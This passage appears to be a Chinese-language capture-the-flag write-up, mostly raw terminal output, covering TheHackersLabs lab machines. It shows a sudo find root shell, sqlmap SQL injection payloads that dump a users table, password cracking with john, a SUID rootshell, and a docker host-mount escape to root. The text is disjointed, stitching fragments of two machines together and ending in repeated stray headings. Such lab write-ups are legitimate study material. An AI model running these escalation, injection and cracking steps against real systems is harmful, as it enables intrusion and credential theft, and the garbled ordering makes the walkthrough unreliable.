Last login: Fri Jan 10 17:42:22 2025 from 192.168.1.38 superadministrator@thehackerslabs-bocatacalamares:~$ cd superadministrator@thehackerslabs-bocatacalamares:~$ ls flag.txt recordatorio.txt superadministrator@thehackerslabs-bocatacalamares:~$ cat flag.txt c3Vkby?????? superadministrator@thehackerslabs-bocatacalamares:~$ cat recordatorio.txt Me han dicho que existe una pagina llamada gtfobins muy util para ctfs, la dejo aquí apuntada para recordarlo mas adelante.
最后一句话呢,说是让我关注GTFobins网站,这我经常用的,好多sudo提权都能在这里面看到案例
1 2 3 4 5 6 7 8 9 10
superadministrator@thehackerslabs-bocatacalamares:~$ sudo -l Matching Defaults entries for superadministrator on thehackerslabs-bocatacalamares: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User superadministrator may run the following commands on thehackerslabs-bocatacalamares: (ALL) NOPASSWD: /usr/bin/find superadministrator@thehackerslabs-bocatacalamares:~$ sudo /usr/bin/find . -exec /bin/sh \; -quit # id uid=0(root) gid=0(root) groups=0(root)
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.189.183 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 23:03 CST Nmap scan report for 10.161.189.183 Host is up (0.78s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.45 seconds
(base) yolo@yolo:~$ dirsearch -u http://10.161.189.183/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
Task Completed (base) yolo@yolo:~$ nmap -A -p 2222 10.161.189.183 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 23:06 CST Nmap scan report for 10.161.189.183 Host is up (0.0013s latency).
PORT STATE SERVICE VERSION 2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 da:58:27:97:82:a0:b0:c5:96:bc:69:7d:05:a0:c9:34 (RSA) | 256 fd:ce:34:44:25:fe:ee:6b:89:46:2d:05:eb:dc:86:f1 (ECDSA) |_ 256 7f:19:1b:7a:ba:aa:4f:65:62:f1:51:cf:89:c6:e7:b3 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 18:12:08 /2025-11-24/ [18:12:08] [INFO] resuming back-end DBMS 'mysql' [18:12:08] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2983=2983 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 1380 FROM (SELECT(SLEEP(5)))Hcia) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-9251 UNION ALL SELECT CONCAT(0x71716b7871,0x65586f65506d4d50494b7349624d6255474f4b63564d557067455978414f554b625167536f4c7662,0x716b717a71),NULL,NULL-- - --- [18:12:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.0.12 [18:12:08] [INFO] fetched data logged to text files under '/home/yolo/.local/share/sqlmap/output/10.161.197.250' [18:12:08] [WARNING] your sqlmap version is outdated [*] ending @ 18:12:08 /2025-11-24/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 18:15:24 /2025-11-24/ [18:15:24] [INFO] resuming back-end DBMS 'mysql' [18:15:24] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2983=2983 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 1380 FROM (SELECT(SLEEP(5)))Hcia) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-9251 UNION ALL SELECT CONCAT(0x71716b7871,0x65586f65506d4d50494b7349624d6255474f4b63564d557067455978414f554b625167536f4c7662,0x716b717a71),NULL,NULL-- - --- [18:15:24] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.0.12 [18:15:24] [INFO] fetching columns for table 'users' in database 'blog' [18:15:24] [INFO] fetching entries for table 'users' in database 'blog' [18:15:24] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] [18:15:26] [INFO] using hash method 'sha256_generic_passwd' [18:15:26] [INFO] resuming password 'runner' for hash '527aa9f431539da8e151d5434d1d5e611d973f601d8e970790882624554146b0' for user 'david' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > [18:15:27] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] [18:15:28] [INFO] starting dictionary-based cracking (sha256_generic_passwd) [18:15:28] [INFO] starting 4 processes Database: blog Table: users [3 entries] +----+---------------------------------------------------------------------------+----------+ | id | password | username | +----+---------------------------------------------------------------------------+----------+ | 1 | 527aa9f431539da8e151d5434d1d5e611d973f601d8e970790882624554146b0 (runner) | david | | 2 | 7927e941a969cdf471354e79b7ae29ae25ca04d59f66d6c19f9c43a9367ec498 | maria | | 3 | febb36d29baf28da1a00cad0cc6937d49f13738ff9dd88276e7c85920d2bff40 | ian | +----+---------------------------------------------------------------------------+----------+ [18:15:32] [INFO] table 'blog.users' dumped to CSV file '/home/yolo/.local/share/sqlmap/output/10.161.197.250/dump/blog/users.csv' [18:15:32] [INFO] fetched data logged to text files under '/home/yolo/.local/share/sqlmap/output/10.161.197.250' [18:15:32] [WARNING] your sqlmap version is outdated [*] ending @ 18:15:32 /2025-11-24/
(base) yolo@yolo:~$ ssh david@10.161.197.250 -p 2222 The authenticity of host '[10.161.197.250]:2222 ([10.161.197.250]:2222)' can't be established. ED25519 key fingerprint is SHA256:0PpHfqtGNxbHeILNpRebyOVMei8/5L6vgtwoUePOZOM. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.161.197.250]:2222' (ED25519) to the list of known hosts. david@10.161.197.250's password: Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 6.8.0-49-generic x86_64)
This system has been minimized by removing packages and content that are not required on a system that usersdo not log into.
To restore this content, you can run the 'unminimize'command. Last login: Sun Nov 23 15:13:14 2025 from 10.161.155.145 david@30acf6ca1fb6:~$ id uid=1000(david) gid=1000(david) groups=1000(david)
(base) yolo@yolo:~/Desktop/timu/test$ zip2john credenciales.zip > ziphash ver 2.0 efh 5455 efh 7875 credenciales.zip/credenciales.xlsx PKZIP Encr: TS_chk, cmplen=4728, decmplen=5346, crc=BA8EA891 ts=7424 cs=7424 type=8 Note: It is normal for some outputs to be very large (base) yolo@yolo:~/Desktop/timu/test$ john ziphash --wordlist=/snap/seclists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Cracked 1 password hash (is in /home/yolo/Desktop/tools/john/run/john.pot), use "--show" No password hashes left to crack (see FAQ) (base) yolo@yolo:~/Desktop/timu/test$ john ziphash --show credenciales.zip/credenciales.xlsx:rockandroll:credenciales.xlsx:credenciales.zip::credenciales.zip
1 password hash cracked, 0 left
我这里是因为昨晚爆破过,所以直接–show展现结果了,解密后拿到另一个用户的账密信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
david@30acf6ca1fb6:~$ su maria Password: maria@30acf6ca1fb6:/home/david$ id uid=1001(maria) gid=1001(maria) groups=1001(maria) maria@30acf6ca1fb6:/home/david$ cd maria@30acf6ca1fb6:~$ ls maria@30acf6ca1fb6:~$ ls -la total 36 drwxr-xr-x 3 maria maria 4096 Nov 23 15:29 . drwxr-xr-x 1 root root 4096 Nov 28 2024 .. lrwxrwxrwx 1 root root 9 Nov 28 2024 .bash_history -> /dev/null -rw-r--r-- 1 maria maria 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 maria maria 3771 Feb 25 2020 .bashrc drwx------ 2 maria maria 4096 Nov 28 2024 .cache -rw------- 1 root maria 97 Nov 23 15:29 .mysql_history -rw-r--r-- 1 maria maria 807 Feb 25 2020 .profile -rw-rw-r-- 1 maria maria 0 Dec 2 2024 .selected_editor -rw------- 1 maria maria 5145 Nov 23 15:22 .viminfo
maria@30acf6ca1fb6:~$ cat .viminfo # This viminfo file was generated by Vim 8.1. # You may edit it if you're careful!
# Viminfo version |1,4
# Value of 'encoding' when this file was written *encoding=latin1
# hlsearch on (H) or off (h): ~h # Command Line History (newest to oldest): :q |2,0,1763911325,,"q" :q! |2,0,1733154665,,"q!" :wq |2,0,1732826222,,"wq"
# Search String History (newest to oldest):
# Expression History (newest to oldest):
# Input Line History (newest to oldest):
# Debug Line History (newest to oldest):
# Registers: ""1 LINE 0 # Directorio donde se almacenará el backup |3,1,1,1,1,0,1732815719,"# Directorio donde se almacenará el backup" "2 LINE 0 asd: |3,0,2,1,1,0,1732815718,"asd:" # File marks: '0 30 0 /opt/scripts/backup.sh |4,48,30,0,1763911325,"/opt/scripts/backup.sh" '1 1 0 /start.sh |4,49,1,0,1733154665,"/start.sh" '2 1 0 /tmp/crontab.PxMFFK/crontab |4,50,1,0,1733153515,"/tmp/crontab.PxMFFK/crontab" '3 3 18 /opt/scripts/backup.sh |4,51,3,18,1732826222,"/opt/scripts/backup.sh" '4 3 18 /opt/scripts/backup.sh |4,52,3,18,1732826222,"/opt/scripts/backup.sh" '5 2 0 /opt/scripts/backup.sh |4,53,2,0,1732815724,"/opt/scripts/backup.sh" '6 2 0 /opt/scripts/backup.sh |4,54,2,0,1732815724,"/opt/scripts/backup.sh" '7 2 0 /opt/scripts/backup.sh |4,55,2,0,1732815724,"/opt/scripts/backup.sh" ......省略了一些重复的...... |4,39,1,0,1732815706,"/opt/scripts/backup.sh" # History of marks within files (newest to oldest): > /opt/scripts/backup.sh * 1763911323 0 " 30 0 ^ 3 19 . 3 18 + 2 0 + 32 0 + 3 0 + 3 18
maria@30acf6ca1fb6:~$ ls /tmp blog.sql rootshell tmp.rudLLA2neY maria@30acf6ca1fb6:~$ /tmp/rootshell -p rootshell-5.0# id uid=1001(maria) gid=1001(maria) euid=0(root) groups=1001(maria)
当前已经有root权限了
1 2 3 4 5 6
rootshell-5.0# ls /root TODO_LIST.txt rootshell-5.0# cat /root/TODO_LIST.txt 1. Crear un script para automatizar los backups de la base de datos. (OK) 2. Cifrar las contraseñas de la base de datos. (OK) 3. Avisar a Ian para que cambie su contraseña, a ver si deja usar su famosa contraseña "iambatman" en todos lados. (Pendiente)
获取了一组新的用户凭证,接下来才是真的进入了靶机,而不是容器
进来容器还不够,也就拿到个user.txt
1 2
ian@TheHackersLabs-Runners:~$ ls user.txt
然后关注到/home下还有用户elliot
1 2 3 4 5 6 7 8 9 10 11 12
ian@TheHackersLabs-Runners:/home/elliot$ ls -la total 36 drwxr-xr-x 4 elliot elliot 4096 Nov 28 2024 . drwxr-xr-x 4 root root 4096 Nov 28 2024 .. lrwxrwxrwx 1 root root 9 Nov 28 2024 .bash_history -> /dev/null -rw-r--r-- 1 elliot elliot 220 Mar 31 2024 .bash_logout -rw-r--r-- 1 elliot elliot 3771 Mar 31 2024 .bashrc drwx------ 3 elliot elliot 4096 Nov 28 2024 .cache -rw------- 1 elliot elliot 20 Nov 27 2024 .lesshst -rw-r--r-- 1 elliot elliot 904 Nov 28 2024 miscredenciales.psafe3 -rw-r--r-- 1 elliot elliot 807 Mar 31 2024 .profile drwx------ 2 elliot elliot 4096 Nov 27 2024 .ssh
(base) yolo@yolo:~/Desktop/timu/test$ psafe2john miscredenciales.psafe3 > psafe.hash (base) yolo@yolo:~/Desktop/timu/test$ john --wordlist=/snap/seclists/rockyou.txt psafe.hash Using default input encoding: UTF-8 Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x]) Cost 1 (iteration count) is 2048 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, 'h'forhelp, almost any other key for status metallica (miscredencial) 1g 0:00:00:00 DONE (2025-11-24 18:54) 12.50g/s 51200p/s 51200c/s 51200C/s 123456..oooooo Use the "--show" option to display all of the cracked passwords reliably Session completed
elliot@TheHackersLabs-Runners:~$ id uid=1000(elliot) gid=1000(elliot) groups=1000(elliot),46(plugdev),110(docker)
1 2 3 4 5 6
elliot@TheHackersLabs-Runners:~$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 30acf6ca1fb6 root_blog "/start.sh" 12 months ago Up About an hour 0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:2222->22/tcp, :::2222->22/tcp ubuntu_blog elliot@TheHackersLabs-Runners:~$ docker run -v /:/mnt --rm -it root_blog chroot /mnt sh # id uid=0(root) gid=0(root) groups=0(root)
docker run -v /:/mnt --rm -it root_blog chroot /mnt sh
### 信息搜集
### 信息搜集
### 信息搜集
